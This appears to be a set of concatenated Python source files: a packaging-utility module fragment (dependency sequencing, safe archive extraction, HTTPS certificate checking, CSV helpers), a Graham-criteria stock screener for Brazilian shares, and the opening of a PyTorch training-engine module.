self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node],lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node],index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node: break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ['digraph G {']
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(' %s -> %s;' % (pred, succ))
for node in self._nodes:
result.append(' %s;' % node)
result.append('}')
return '\n'.join(result)
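# Illustrative usage sketch (not part of the original module): edges are added as
# (predecessor, successor) pairs and get_steps() yields them dependency-first.
def _example_sequencer():
    seq = Sequencer()
    seq.add('build', 'test')
    seq.add('test', 'release')
    return list(seq.get_steps('release'))   # ['build', 'test', 'release']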
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = ('.tar.gz', '.tar.bz2', '.tar', '.zip',
'.tgz', '.tbz', '.whl')
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode('utf-8')
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError('path outside destination: %r' % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith(('.zip', '.whl')):
format = 'zip'
elif archive_filename.endswith(('.tar.gz', '.tgz')):
format = 'tgz'
mode = 'r:gz'
elif archive_filename.endswith(('.tar.bz2', '.tbz')):
format = 'tbz'
mode = 'r:bz2'
elif archive_filename.endswith('.tar'):
format = 'tar'
mode = 'r'
else:
raise ValueError('Unknown format for %r' % archive_filename)
try:
if format == 'zip':
archive = ZipFile(archive_filename, 'r')
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != 'zip' and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode('utf-8')
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ('', 'K', 'M', 'G','T','P')
class Progress(object):
unknown = 'UNKNOWN'
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = '100 %'
elif self.max is None:
result = ' ?? %'
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = '%3d %%' % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = '??:??:??'
#elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime('%H:%M:%S', time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = 'Done'
t = self.elapsed
#import pdb; pdb.set_trace()
else:
prefix = 'ETA '
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
#import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return '%s: %s' % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return '%d %sB/s' % (result, unit)
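# Illustrative usage sketch (not part of the original module): a transfer loop can
# drive Progress and render its derived properties (assumes a positive maxval and
# chunk sizes that sum to no more than maxval).
def _example_progress(total, chunk_sizes):
    p = Progress(maxval=total).start()
    for n in chunk_sizes:
        p.increment(n)
        sys.stderr.write('%s %s %s\r' % (p.percentage, p.ETA, p.speed))
    p.stop()
    return p.percentage   # '100 %'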
#
# Glob functionality
#
RICH_GLOB = re.compile(r'\{([^}]*)\}')
_CHECK_RECURSIVE_GLOB = re.compile(r'[^/\\,{]\*\*|\*\*[^/\\,}]')
_CHECK_MISMATCH_SET = re.compile(r'^[^{]*\}|\{[^}]*$')
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
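# Illustrative sketch (not part of the original module; the paths are hypothetical):
#   iglob('src/{lib,tests}/*.py')   # expands the set, then globs each alternative
#   iglob('docs/**/*.rst')          # walks docs/ recursively, matching *.rst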
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, '_tunnel_host', False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, 'SSLContext'):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs)
else:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, 'HAS_SNI', False):
kwargs['server_hostname'] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug('Host verified: %s', self.host)
except CertificateError:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if 'certificate verify failed' in str(e.reason):
raise CertificateError('Unable to verify server certificate '
'for %s' % req.host)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError('Unexpected HTTP request on what should be a secure '
'connection: %s' % req)
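# Illustrative usage sketch (not part of the original module; the certificate path
# is hypothetical): an opener built from this handler verifies the peer against a
# CA bundle and rejects any plain-HTTP request.
#
#   handler = HTTPSOnlyHandler('/path/to/cacerts.pem', check_domain=True)
#   opener = build_opener(handler)          # build_opener from the urllib machinery
#   opener.open('https://example.com/')     # verified HTTPS request
#   opener.open('http://example.com/')      # raises URLError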
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class HTTPS(httplib.HTTPS):
def __init__(self, host='', port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs['timeout'] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None,
**kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop('timeout', None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get('use_datetime', 0)
if scheme == 'https':
tcls = SafeTransport
else:
tcls = Transport
kwargs['transport'] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
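# Illustrative usage sketch (not part of the original module; the endpoint URL is
# hypothetical): passing a timeout routes calls through the Transport/SafeTransport
# subclasses defined above.
#
#   proxy = ServerProxy('https://example.org/xmlrpc', timeout=10)
#   # XML-RPC calls made via `proxy` now use a 10-second socket timeout.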
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += 'b'
else:
kwargs['newline'] = ''
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
'delimiter': str(','), # The strs are used because we need native
'quotechar': str('"'), # str in the csv API (2.x won't take
'lineterminator': str('\n') # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if 'stream' in kwargs:
stream = kwargs['stream']
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs['path'], 'r')
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode('utf-8')
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, 'w')
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode('utf-8')
r.append(item)
row = r
self.writer.writerow(row)
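# Illustrative usage sketch (not part of the original module): RECORD-style rows can
# be written and read back with the same dialect on both Python 2.x and 3.x.
def _example_csv_roundtrip(path, rows):
    with CSVWriter(path) as writer:
        for row in rows:          # each row is a list of text values
            writer.writerow(row)
    with CSVReader(path=path) as reader:
        return [row for row in reader]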
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters['inc'] = 'inc_convert'
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if '()' in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop('()')
if not callable(c):
c = self.resolve(c)
props = config.pop('.', None)
# Check for valid identifiers
args = config.pop('[]', ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and '()' in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, 'r', encoding='utf-8') as f:
result = json.load(f)
return result
#
# Mixin for running subprocesses and capturing their output
#
class SubprocessMixin(object):
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write('.')
else:
sys.stderr.write(s.decode('utf-8'))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, **kwargs)
t1 = threading.Thread(target=self.reader, args=(p.stdout, 'stdout'))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, 'stderr'))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress('done.', 'main')
elif self.verbose:
sys.stderr.write('done.\n')
return p
|
graham_valuation.py
|
#!/usr/bin/env python3
# Principles used:
# - [x] 1. Survival: the company survived the last 10 years. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# - [x] 2. Earnings stability: profit > 0 in each of the last 10 years. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# - [x] 3. Earnings growth: growing profits over the last 10 years. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
# - [x] 4. Earnings-per-share growth: current LPA (EPS) > 1.33 * LPA of 10 years ago (computed from the average of the first 3 and the last 3 years of that period). http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 5. Dividend stability: dividends paid in each of the last 10 years. http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 6. sqrt(22.5 * VPA * LPA) => the higher, the better. Ideal > 1.5 * price. https://www.sunoresearch.com.br/artigos/valor-intrinseco/?utm_source=PR&utm_medium=artigo&utm_campaign=investing_05122019
# - [x] 7. P/L (price/earnings) => the lower, the better (ideal < 15 and >= 0). http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 8. P/VP (price/book value) => the lower, the better (ideal < 1.5 and >= 0). http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# - [x] 9. Growth over 5 years => the higher, the better (ideal > 5%). https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 10. ROE (Return On Equity) => the higher, the better (ideal above 20%). https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 11. Dividend Yield => the higher, the better (ideal > Selic rate (4.5%)). https://foconomilhao.com/acoes-com-dividend-yield-maior-que-a-selic/
# - [x] 12. Liquidez Corrente (current ratio) => the higher, the better (ideal > 1.5). https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 13. Dívida Bruta/Patrimônio (gross debt/equity) => the lower, the better (ideal < 50%). https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# - [x] 14. Patrimônio Líquido (shareholders' equity) => the higher, the better (ideal > 2000000000).
#### Graham ####
# ===== Next steps =====
# * Market value greater than 2.000.000. # Benjamin Graham # https://edisciplinas.usp.br/pluginfile.php/3821144/mod_resource/content/4/245.pdf
# => https://www.fundamentus.com.br/detalhes.php?papel=PETR4
# * Average trading value above R$ 1 million. # Benjamin Graham # https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# ~> Vol $ méd (2m) > 1.000.000
# => https://www.fundamentus.com.br/detalhes.php?papel=PETR4
# * Long-term debt < working capital # Benjamin Graham # https://www.sunoresearch.com.br/artigos/o-investidor-inteligente-entenda-a-obra-de-benjamin-graham/
# * Has a good level of corporate governance # Benjamin Graham # https://daxinvestimentos.com/analise-fundamentalista-mais-de-200-de-rentabilidade-em-2-anos/
# Earnings series used to draw the chart ;)
# https://api-analitica.sunoresearch.com.br/api/Statement/GetStatementResultsReportByTicker?type=y&ticker=WEGE3&period=10
import sys, os
sys.path.extend([f'./{name}' for name in os.listdir(".") if os.path.isdir(name)])
import fundamentus
import bovespa
import backtest
import browser
import pandas
import numpy
import re
from math import sqrt
from decimal import Decimal
import http.cookiejar
import urllib.request
import json
import threading
import time
import pyperclip
# Populate the shares pandas DataFrame for the provided year
def populate_shares(year):
globals()['year'] = year
globals()['infos'] = {}
if year == current_year():
shares = bovespa.shares()
else:
shares = fundamentus.shares(year)
shares = shares[shares['Cotação'] > 0]
shares = shares[shares['Liquidez 2 meses'] > 0]
shares['Ranking (Graham)'] = 0
fill_infos(shares)
shares = add_ratings(shares)
shares = reorder_columns(shares)
return shares
# infos = {
# 'TRPL4': {
#         "survivability": True/False, # Company with at least 10 years of survival (Graham looked at earnings and dividends over the last 10 years) # Benjamin Graham. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
#         "earnings_stability": True/False, # Earnings stability: profit > 0 in each of the last 10 years # Benjamin Graham. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
#         "earnings_growth": True/False, # Earnings growth: growing profits over the last 10 years # Benjamin Graham. https://www.estrategista.net/o-fracasso-de-benjamin-graham-na-bolsa-atual/
#         "lpa_growth": True/False, # Current LPA (EPS) > 1.33 * LPA of 10 years ago. # Benjamin Graham. (computed from the average of the first 3 and the last 3 years of that period) # http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
#         "dividends_stability": True/False, # Dividends paid in each of the last 10 years. # Benjamin Graham # http://seuguiadeinvestimentos.com.br/a-tecnica-de-investimento-de-benjamin-graham-ii/
# }
# }
def fill_infos(shares):
cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'),
('Accept', 'text/html, text/plain, text/css, text/sgml, */*;q=0.01')]
tickers = list(shares.index)
threads = [threading.Thread(target=fill_infos_by_ticker, args=(ticker,opener,)) for ticker in tickers]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def fill_infos_by_ticker(ticker, opener):
infos[ticker] = {
'survivability': False,
'earnings_stability': False,
'earnings_growth': False,
'lpa_growth': False,
'dividends_stability': False
}
    # Fetch net income ("Lucro Líquido") for the ticker
url = f'https://api-analitica.sunoresearch.com.br/api/Statement/GetStatementResultsReportByTicker?type=y&ticker={ticker}&period=999'
with opener.open(url) as link:
company_results = link.read().decode('ISO-8859-1')
company_results = json.loads(company_results)
current_year = year
lucros = [r for r in company_results if r['description'] == 'Lucro LÃ\xadquido'][0]
years = [x for x in lucros.keys() if re.match('C_\w{4}$', x)]
if(len(years) == 0):
return
years = [x for x in years if int(re.findall('C_(\w{4})$', x)[0]) < current_year]
list.sort(years)
lucros = { year: lucros[year] for year in years }
ultimos_lucros = list(lucros.values())[-10:]
    # Ugly fix for missing data :( It looks like the API has missing data -_-
    # Fill None values with the mean of the available earnings
present_lucros = [i for i in ultimos_lucros if i]
if (len(present_lucros) == 0):
mean = 0
else:
mean = sum(present_lucros) / len(present_lucros)
ultimos_lucros = [mean if v is None else v for v in ultimos_lucros]
# End of Ugly Fix
infos[ticker]['survivability'] = f'C_{current_year - 10}' in lucros.keys()
infos[ticker]['earnings_stability'] = all(ultimos_lucros[i] > 0 for i in range(len(ultimos_lucros)))
infos[ticker]['earnings_growth'] = all(ultimos_lucros[i] <= ultimos_lucros[i+1] for i in range(len(ultimos_lucros)-1)) # Isso aqui deve virar uma função e devemos ver a tendência dessa função!
# Fetching LPA's and DPA's
url = f'https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsYear?ticker={ticker}'
with opener.open(url) as link:
company_indicators = link.read().decode('ISO-8859-1')
company_indicators = json.loads(company_indicators)
# Only consider company indicators before the current_year (robust solution for backtesting purposes)
company_indicators = [ci for ci in company_indicators if ci['year'] < current_year]
last_dpas = [fundament['dpa'] for fundament in company_indicators]
last_lpas = [fundament['lpa'] for fundament in company_indicators]
if (len(last_lpas[:10]) > 0):
infos[ticker]['lpa_growth'] = (sum(last_lpas[:3]) / 3) >= (sum(last_lpas[-3:]) / 3)
if (len(last_dpas[:10]) > 0):
infos[ticker]['dividends_stability'] = all(last_dpas[:10][i] > 0 for i in range(len(last_dpas[:10])))
def add_ratings(shares):
add_graham_columns(shares)
fill_fair_price(shares)
fill_score(shares)
fill_score_explanation(shares)
return fill_special_infos(shares)
# Initialize the Graham indicator columns
def add_graham_columns(shares):
shares['Preço Justo (Graham)'] = 0
shares['Graham Score'] = 0
shares['Preço Justo (Graham) / Cotação'] = 0
shares['10 Anos de Sobrevivencia'] = False
shares['Lucros Positivos nos Ultimos 10 Anos'] = False
shares['Lucros Crescentes nos Ultimos 10 Anos'] = False
shares['LPA atual > 1.33 * LPA 10 anos atrás'] = False
shares['Dividendos Positivos nos Ultimos 10 Anos'] = False
# Benjamin Graham devised the following formula to compute the intrinsic value (Preço Justo (Graham)):
# => sqrt(22.5 * VPA * LPA)
def fill_fair_price(shares):
for index in range(len(shares)):
if ((shares['P/L'][index] > 0) & (shares['P/VP'][index] > 0)):
shares['Preço Justo (Graham)'][index] = sqrt(Decimal(22.5) * (shares['Cotação'][index] / shares['P/L'][index]) * (shares['Cotação'][index] / shares['P/VP'][index]))
else:
shares['Preço Justo (Graham)'][index] = 0
    shares['Preço Justo (Graham) / Cotação'] = shares['Preço Justo (Graham)'] / shares['Cotação'] # Ideal > 1. The higher, the better! It means the share should be worth 1x more, 2x more, 3x more, etc.
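# Illustrative worked example (hypothetical numbers, not from the dataset): with
# Cotação = 25.00, P/L = 10 and P/VP = 1.25, we get LPA = 25/10 = 2.5 and
# VPA = 25/1.25 = 20, so Preço Justo (Graham) = sqrt(22.5 * 20 * 2.5) ≈ 33.54 and
# Preço Justo (Graham) / Cotação ≈ 1.34, which would clear the 1.5 margin-of-safety
# filter only at a lower price.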
def fill_score(shares):
shares['Graham Score'] += (shares['Preço Justo (Graham) / Cotação'] > Decimal(1.5)).astype(int)
shares['Graham Score'] += ((shares['P/L'] < 15) & (shares['P/L'] >= 0)).astype(int)
shares['Graham Score'] += ((shares['P/VP'] < 1.5) & (shares['P/VP'] >= 0)).astype(int)
shares['Graham Score'] += (shares['Crescimento em 5 anos'] > 0.05).astype(int)
shares['Graham Score'] += (shares['ROE'] > 0.2).astype(int)
shares['Graham Score'] += (shares['Dividend Yield'] > 0.045).astype(int)
shares['Graham Score'] += (shares['Liquidez Corrente'] > 1.5).astype(int)
shares['Graham Score'] += (shares['Dívida Bruta/Patrimônio'] < 0.5).astype(int)
shares['Graham Score'] += (shares['Patrimônio Líquido'] > 2000000000).astype(int)
# Show which filters each share passed to earn its Graham Score
def fill_score_explanation(shares):
shares['Margem de Segurança: Preço Justo (Graham) > 1.5 * Cotação'] = shares['Preço Justo (Graham) / Cotação'] > Decimal(1.5)
shares['P/L < 15 (E não negativo)'] = (shares['P/L'] < 15) & (shares['P/L'] >= 0)
shares['P/VP < 1.5 (E não negativo)'] = (shares['P/VP'] < 1.5) & (shares['P/VP'] >= 0)
shares['Crescimento em 5 anos > 0.05'] = shares['Crescimento em 5 anos'] > 0.05
shares['ROE > 20%'] = shares['ROE'] > 0.2
shares['Dividend Yield > 0.045 (Taxa Selic)'] = shares['Dividend Yield'] > 0.045
shares['Liquidez Corrente > 1.5'] = shares['Liquidez Corrente'] > 1.5
shares['Dívida Bruta/Patrimônio < 0.5'] = shares['Dívida Bruta/Patrimônio'] < 0.5
shares['Patrimônio Líquido > 2 Bilhões'] = shares['Patrimônio Líquido'] > 2000000000
def fill_special_infos(shares):
for index in range(len(shares)):
ticker = shares.index[index]
shares['Graham Score'][index] += int(infos[ticker]['survivability'])
shares['10 Anos de Sobrevivencia'][index] = infos[ticker]['survivability']
shares['Graham Score'][index] += int(infos[ticker]['earnings_stability'])
shares['Lucros Positivos nos Ultimos 10 Anos'][index] = infos[ticker]['earnings_stability']
shares['Graham Score'][index] += int(infos[ticker]['earnings_growth'])
shares['Lucros Crescentes nos Ultimos 10 Anos'][index] = infos[ticker]['earnings_growth']
shares['Graham Score'][index] += int(infos[ticker]['lpa_growth'])
shares['LPA atual > 1.33 * LPA 10 anos atrás'][index] = infos[ticker]['lpa_growth']
shares['Graham Score'][index] += int(infos[ticker]['dividends_stability'])
shares['Dividendos Positivos nos Ultimos 10 Anos'][index] = infos[ticker]['dividends_stability']
return shares
# Reorder the table so that Cotação (price), intrinsic value and Graham Score are the first columns
def reorder_columns(shares):
columns = ['Ranking (Graham)', 'Cotação', 'Preço Justo (Graham)', 'Graham Score', 'Preço Justo (Graham) / Cotação', 'Setor', 'Subsetor', 'Segmento']
return shares[columns + [col for col in shares.columns if col not in tuple(columns)]]
# Get the current_year integer value, for example: 2020
def current_year():
return int(time.strftime("%Y"))
# python3 graham_valuation.py "{ 'year': 2015 }"
if __name__ == '__main__':
year = current_year()
if len(sys.argv) > 1:
year = int(eval(sys.argv[1])['year'])
shares = populate_shares(year)
shares.sort_values(by=['Preço Justo (Graham) / Cotação', 'Graham Score'], ascending=[False, False], inplace=True)
shares = shares[shares['Graham Score'] >= 8]
shares['Ranking (Graham)'] = range(1, len(shares) + 1)
print(shares)
pyperclip.copy(shares.to_markdown())
if year != current_year():
backtest.run_all(fundamentus.start_date(year), list(shares.index[:20]))
|
multiverse_pt.py
|
#!/usr/bin/env python
'''
engine_mx
Created by Seria at 12/02/2019 3:45 PM
Email: zzqsummerai@yeah.net
_ooOoo_
o888888888o
o88`_ . _`88o
(| 0 0 |)
O \ 。 / O
_____/`-----‘\_____
.’ \|| _ _ ||/ `.
| _ ||| | ||| _ |
| | \\ // | |
| | \-----/ | |
\ .\ ___/- -\___ /. /
,--- / ___\<|>/___ \ ---,
| |: \ \ / / :| |
`\--\_ -. ___ .- _/--/‘
=========== \__ NOBUG __/ ===========
'''
# -*- coding:utf-8 -*-
import torch
import os
import multiprocessing as mp
from types import MethodType
from nebulae.toolkit.utility import ver2num
if ver2num(torch.__version__) >= ver2num('1.6.0'):
is_new_version = True
else:
is_new_version = False
if is_new_version:
class DDP(torch.nn.parallel.DistributedDataParallel):
